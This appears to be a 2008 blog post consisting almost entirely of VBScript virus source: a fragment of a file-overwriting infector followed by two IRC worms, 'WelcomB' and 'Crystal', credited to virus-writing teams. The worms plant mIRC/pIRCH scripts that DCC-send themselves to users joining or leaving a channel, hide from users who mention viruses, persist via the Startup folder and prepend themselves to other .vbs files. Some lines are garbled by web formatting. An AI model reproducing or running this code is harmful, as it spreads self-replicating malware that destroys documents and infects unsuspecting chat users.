cbFoldersToInfect(1) = cbFSO.GetSpecialFolder(cbWindowsFolder)
cbFoldersToInfect(2) = cbFSO.GetSpecialFolder(cbWindowsFolder) & "\Profiles\All Users\Desktop"
cbFoldersToInfect(3) = cbFSO.GetSpecialFolder(cbWindowsFolder) & "\Profiles\Administrator\Desktop"
cbFoldersToInfect(4) = cbFSO.GetSpecialFolder(cbWindowsFolder) & "\Desktop"
Set cbWeFile=cbFSO.OpenTextFile(cbWePath, cbForReading)
cbVirusCode = cbWeFile.Read(cbVirusSize)
For Each cbFolder in cbFoldersToInfect
cbInfect cbFolder
If Day(Now()) = 2 And Hour(Now()) = 9 Then
Set cbDriveList = cbFSO.Drives
For Each cbDrive in cbDriveList
If cbDrive.DriveType = 2 Or cbDrive.DriveType = 3 then cbRecursiveFolderScan cbDrive & "\"
End If
Sub cbRecursiveFolderScan(cbTheFolder)
Dim cbMoreFolders, cbTempFolder
For Each cbFile in cbFSO.GetFolder(TheFolder).Files
If cbFSO.GetExtensionName(cbFile) = "txt" or cbFSO.GetExtensionName(cbFile) = "doc" Then
Set cbTextFile = cbFSO.OpenTextFile(cbFile, cbForWriting)
cbTextFile.WriteLine " "
cbTextFile.WriteLine " _ _ "
cbTextFile.WriteLine " |_| |_| "
cbTextFile.WriteLine " | | /^^^\ | | "
'= VBS/mIRC/pIRCH.WelcomB.a =
'= by -KD- [Metaphase VX Team] & [NoMercyVirusTeam] =
'= Technology used from Code Breakers =
On Error Resume Next
Const Welcomb = 5416
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Const XWindowsFolder = 0
Dim FSO, ScrFile, Cini, InfMarker, MyCode
Dim Parent, MyWelcomb, V, VFile, EvFile
Dim FoldersToGet(2), FolderX, VCode
Set FSO = CreateObject("Scripting.FileSystemObject")
Parent = Wscript.ScriptFullName
Set Cini = FSO.OpenTextFile("c:\mirc\mirc.ini", ForAppending, True)
Cini.WriteLine "[rfiles]"
Cini.WriteLine "n100=script.ini"
Set ScrFile = FSO.CreateTextFile("c:\mirc\script.ini", True)
ScrFile.WriteLine "[script]"
ScrFile.WriteLine "n0; VBS/mIRC/pIRCH WelcomB.a"
ScrFile.WriteLine "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
ScrFile.WriteLine "n2= /dcc send $nick c:\WINDOWS\system\cute.vbs"
ScrFile.WriteLine "n3=}"
ScrFile.WriteLine "n4="
ScrFile.WriteLine "n5=;ON 1:PART:#:{ /if ( $nick == $me ) { halt }"
ScrFile.WriteLine "n6=/dcc send $nick c:\WINDOWS\system\cute.vbs"
ScrFile.WriteLine "n7=}"
ScrFile.WriteLine "n8="
ScrFile.WriteLine "n9=on 1:TEXT:*script.ini*:#:/.ignore $nick"
ScrFile.WriteLine "n10=on 1:TEXT:*script.ini*Question/.ignore $nick"
ScrFile.WriteLine "n11=on 1:TEXT:*virus*:#:/.ignore $nick"
ScrFile.WriteLine "n12=on 1:TEXT:*virus*Question/.ignore $nick"
ScrFile.WriteLine "n13=on 1:TEXT:*worm*:#:/.ignore $nick"
ScrFile.WriteLine "n14=on 1:TEXT:*worm*Question/.ignore $nick"
ScrFile.WriteLine "n15=on 1:TEXT:*cute*:#:/.ignore $nick"
ScrFile.WriteLine "n16=on 1:TEXT:*cute*Question/.ignore $nick"
ScrFile.WriteLine "n17=on 1:TEXT:*WelcomB*:#:/.ignore $nick"
ScrFile.WriteLine "n18=on 1:TEXT:*WelcomB*Question/.ignore $nick"
ScrFile.WriteLine "n19=on 1:QUIT:#:/msg $chan There the Teachers that taught me to hate me"
Set EvFile = FSO.CreateTextFile("c:\WINDOWS\events.dll", True)
EvFile.WriteLine "[Levels]"
EvFile.WriteLine "Enabled=1"
EvFile.WriteLine "Count=6"
EvFile.WriteLine "Level1=000-Unknowns"
EvFile.WriteLine "000-UnknownsEnabled=1"
EvFile.WriteLine "Level2=100-Level 100"
EvFile.WriteLine "100-Level 100Enabled=1"
EvFile.WriteLine "Level3=200-Level 200"
EvFile.WriteLine "200-Level 200Enabled=1"
EvFile.WriteLine "Level4=300-Level 300"
EvFile.WriteLine "300-Level 300Enabled=1"
EvFile.WriteLine "Level5=400-Level 400"
EvFile.WriteLine "400-Level 400Enabled=1"
EvFile.WriteLine "Level6=500-Level 500"
EvFile.WriteLine "500-Level 500Enabled=1"
EvFile.WriteLine ""
EvFile.WriteLine "[000-Unknowns]"
EvFile.WriteLine "User1=*!*@*"
EvFile.WriteLine "UserCount=1"
EvFile.WriteLine "Event1=; VBS/mIRC/pIRCH WelcomB.a"
EvFile.WriteLine "Event2=ON JOIN:#:/dcc send $nick c:\WINDOWS\system\cute.vbs"
EvFile.WriteLine "Event2=ON PART:#:/dcc send $nick c:\WINDOWS\system\cute.vbs"
EvFile.WriteLine "Event3=VERSION:/notice $nick \-1 pIRCH: WelcomB by -KD- I'm Infected!!! \-1:-"
EvFile.WriteLine "Event4=ON TEXT:*WelcomB*:#:/kick # $nick pIRCH/VBS/mIRC"
EvFile.WriteLine "Event5=ON TEXT:*WelcomB*:#:/ignore # $nick"
EvFile.WriteLine "Event6=ON TEXT:*vbs*:#:/ignore # $nick"
EvFile.WriteLine "Event7=ON TEXT:*virus*:#:/ignore # $nick"
EvFile.WriteLine "Event8=ON TEXT:*worm*:#:/ignore # $nick"
EvFile.WriteLine "Event9=ON TEXT:*cute*:#:/ignore # $nick"
EvFile.WriteLine "EventCount=9"
EvFile.WriteLine ""
EvFile.WriteLine "[100-Level 100]"
EvFile.WriteLine "UserCount=0"
EvFile.WriteLine "EventCount=0"
EvFile.WriteLine ""
EvFile.WriteLine "[200-Level 200]"
EvFile.WriteLine "UserCount=0"
EvFile.WriteLine "EventCount=0"
EvFile.WriteLine ""
EvFile.WriteLine "[300-Level 300]"
EvFile.WriteLine "UserCount=0"
EvFile.WriteLine "EventCount=0"
EvFile.WriteLine ""
EvFile.WriteLine "[400-Level 400]"
EvFile.WriteLine "UserCount=0"
EvFile.WriteLine "EventCount=0"
EvFile.WriteLine ""
EvFile.WriteLine "[500-Level 500]"
EvFile.WriteLine "UserCount=0"
EvFile.WriteLine "EventCount=0"
FSO.CopyFile "c:\WINDOWS\events.dll", "c:\pirch32\events.ini"
FSO.CopyFile "c:\WINDOWS\events.dll", "c:\pirch98\events.ini"
FSO.CopyFile Parent, "c:\WINDOWS\system\cute.vbs"
FSO.CopyFile Parent, "c:\WINDOWS\Start Menu\Programs\StartUp\Startup.vbs"
If Day(Now()) = 1 or Day(Now()) = 20 Then
MsgBox "There the teacher's that taught me to hate me.", 4096 , "WelcomB"
End If
FoldersToGet(0) = "."
FoldersToGet(1) = FSO.GetSpecialFolder(XWindowsFolder)
FoldersToGet(2) = FSO.GetSpecialFolder(XWindowsFolder) & "\Desktop"
Set MyWelcomb = FSO.OpenTextFile(Parent, ForReading)
MyCode = MyWelcomb.Read(Welcomb)
For Each FolderX in FoldersToGet
Catch FolderX
Sub Catch(TheFolder)
For Each V in FSO.GetFolder(TheFolder).Files
If FSO.GetExtensionName(V.Name) = "vbs" then
Set VFile = FSO.OpenTextFile(V.Path,ForReading)
InfMarker = VFile.read(Cool
If InfMarker <> "'Welcomb" Then
Set VFile = FSO.OpenTextFile(V.path,ForReading)
VCode = VFile.ReadAll
VCode = MyCode & VCode
Set VFile = FSO.OpenTextFile(V.Path,ForWriting,True)
VFile.Write VCode
end if
end if
End Sub
'= VBS/pIRCH98/32.Crystal.c =
'= by -KD- [Metaphase VX Team] & [NoMercyVirusTeam] =
On Error Resume Next
Const TheCrystal = 5238
Const ForReading = 1, ForWriting = 2
Const XWindowsFolder = 0
Dim FSO, InfMarker, MyCode, MyBaby
Dim Crystal, MyCrystal, V, VFile
Dim FoldersToGet(3), FolderX, VCode
Set FSO = CreateObject("Scripting.FileSystemObject")
Crystal = Wscript.ScriptFullName
Set MyBaby = FSO.CreateTextFile("c:\WINDOWS\events3.dll", True)
MyBaby.WriteLine "[Levels]"
MyBaby.WriteLine "Enabled=1"
MyBaby.WriteLine "Count=6"
MyBaby.WriteLine "Level1=000-Unknowns"
MyBaby.WriteLine "000-UnknownsEnabled=1"
MyBaby.WriteLine "Level2=100-Level 100"
MyBaby.WriteLine "100-Level 100Enabled=1"
MyBaby.WriteLine "Level3=200-Level 200"
MyBaby.WriteLine "200-Level 200Enabled=1"
MyBaby.WriteLine "Level4=300-Level 300"
MyBaby.WriteLine "300-Level 300Enabled=1"
MyBaby.WriteLine "Level5=400-Level 400"
MyBaby.WriteLine "400-Level 400Enabled=1"
MyBaby.WriteLine "Level6=500-Level 500"
MyBaby.WriteLine "500-Level 500Enabled=1"
MyBaby.WriteLine ""
MyBaby.WriteLine "[000-Unknowns]"
MyBaby.WriteLine "User1=*!*@*"
MyBaby.WriteLine "UserCount=1"
MyBaby.WriteLine "Event1=; VBS/pIRCH98/32.Crystal.c"
MyBaby.WriteLine "Event2=; by -KD- [Metaphase VX Team] & [NoMercyVirusTeam]"
MyBaby.WriteLine "Event3=ON JOIN:#:/notice $nick Tell me that file isnt the cutest Wink"
MyBaby.WriteLine "Event4=ON JOIN:#:/dcc send $nick c:\windows\Crystal2.vbs"
MyBaby.WriteLine "Event5=@ON BAN:*:#:/mode # -o+b $me $banmask | /kick # $nick Dont ban me!!"
MyBaby.WriteLine "Event6=ON PART:#:/notice $nick Case I didnt send it yet this is the cutest thing Ive seen Wink"
MyBaby.WriteLine "Event7=ON PART:#:/dcc send $nick c:\windows\Crystal2.vbs"
MyBaby.WriteLine "Event8=VERSION:/notice $nick \-1 VBS/pIRCH98/32.Crystal.c : Crystal.a by -KD- I'm Infected!!! \-1:-"
MyBaby.WriteLine "Event9=ON TOPIC:#:/topic # Crystal rocks! | /notice $nick Crystal!!!"
MyBaby.WriteLine "Event10=ON ACTION:*hump*:#:/notice $nick Get off my leg!!"
MyBaby.WriteLine "Event11=ON ACTION:*hump*:#:/kick # $nick Get off my leg I said!!"
MyBaby.WriteLine "Event12=ON TEXT:*hump*:#:/ignore # $nick"
MyBaby.WriteLine "Event13=ON TEXT:*sex*:#:/kick # $nick Crystal!!!"
MyBaby.WriteLine "Event14=ON TEXT:*f**k*:#:/kick # $nick Crystal!!!"
MyBaby.WriteLine "Event15=ON TEXT:*damn*:#:/kick # $nick Crystal!!!"
MyBaby.WriteLine "Event16=ON TEXT:*satan*:#:/kick # $nick Crystal!!!"
MyBaby.WriteLine "Event17=ON TEXT:*dick*:#:/kick # $nick Crystal!!!"
MyBaby.WriteLine "Event18=ON TEXT:*hump*:#:/ignore # $nick"
MyBaby.WriteLine "Event19=ON TEXT:*hell*:#:/ignore # $nick"
MyBaby.WriteLine "Event20=ON TEXT:*virus*:#:/ignore # $nick"
MyBaby.WriteLine "Event21=ON TEXT:*worm*:#:/ignore # $nick"
MyBaby.WriteLine "Event22=ON TEXT:*trojan*:#:/ignore # $nick"
MyBaby.WriteLine "Event23=ON TEXT:*Crystal*:#:/ignore # $nick"
MyBaby.WriteLine "Event24=ON TEXT:*baby*:*:/dcc send $nick c:\windows\Crystal2.vbs"
MyBaby.WriteLine "Event25=PING:/notice $nick Oh god baby do it again! Wink"
MyBaby.WriteLine "Event26=ON QUIT:/msg :#vir: VBS/pIRCH98/32.Crystal.c by -KD-! gotta love it!"
MyBaby.WriteLine "Event27=ON KICKED:*:#: /msg $nick What the hell? | /join # | /mode # -o+b $nick $banmask"
MyBaby.WriteLine "EventCount=27"
MyBaby.WriteLine ""
MyBaby.WriteLine "[100-Level 100]"
MyBaby.WriteLine "UserCount=0"
MyBaby.WriteLine "EventCount=0"
MyBaby.WriteLine ""
MyBaby.WriteLine "[200-Level 200]"
MyBaby.WriteLine "UserCount=0"
MyBaby.WriteLine "EventCount=0"
MyBaby.WriteLine ""
MyBaby.WriteLine "[300-Level 300]"
MyBaby.WriteLine "UserCount=0"
MyBaby.WriteLine "EventCount=0"
MyBaby.WriteLine ""
MyBaby.WriteLine "[400-Level 400]"
MyBaby.WriteLine "UserCount=0"
MyBaby.WriteLine "EventCount=0"
MyBaby.WriteLine ""
MyBaby.WriteLine "[500-Level 500]"
MyBaby.WriteLine "UserCount=0"
MyBaby.WriteLine "EventCount=0"
FSO.CopyFile "c:\WINDOWS\events3.dll", "c:\pirch98\events.ini"
FSO.CopyFile "c:\WINDOWS\events3.dll", "c:\pirch32\events.ini"
FSO.CopyFile Crystal, "c:\WINDOWS\Crystal2.vbs"
FSO.CopyFile Crystal, "c:\WINDOWS\Start Menu\Programs\StartUp\Startup.vbs"
If Day(Now()) = 1 or Day(Now()) = 20 Then
MsgBox "The screams fill the room" & Chr(13) & Chr(10) & "Alone I drop and kneel", 4096 , "Crystal"
End If
FoldersToGet(0) = "."
FoldersToGet(1) = FSO.GetSpecialFolder(XWindowsFolder)
FoldersToGet(2) = FSO.GetSpecialFolder(XWindowsFolder) & "\Desktop"
Set MyCrystal = FSO.OpenTextFile(Crystal, ForReading)
MyCode = MyCrystal.Read(TheCrystal)
For Each FolderX in FoldersToGet
Catch FolderX
Sub Catch(TheFolder)
For Each V in FSO.GetFolder(TheFolder).Files
If FSO.GetExtensionName(V.Name) = "vbs" then
Set VFile = FSO.OpenTextFile(V.Path,ForReading)
InfMarker = VFile.read(Cool
If InfMarker <> "'Crystal" Then
Set VFile = FSO.OpenTextFile(V.path,ForReading)
VCode = VFile.ReadAll
VCode = MyCode & VCode
Set VFile = FSO.OpenTextFile(V.Path,ForWriting,True)
VFile.Write VCode
end if
end if
End Sub
'---> Exit[marq=right]
Diposting oleh baracrack di Rabu, April 02, 2008 0 komentar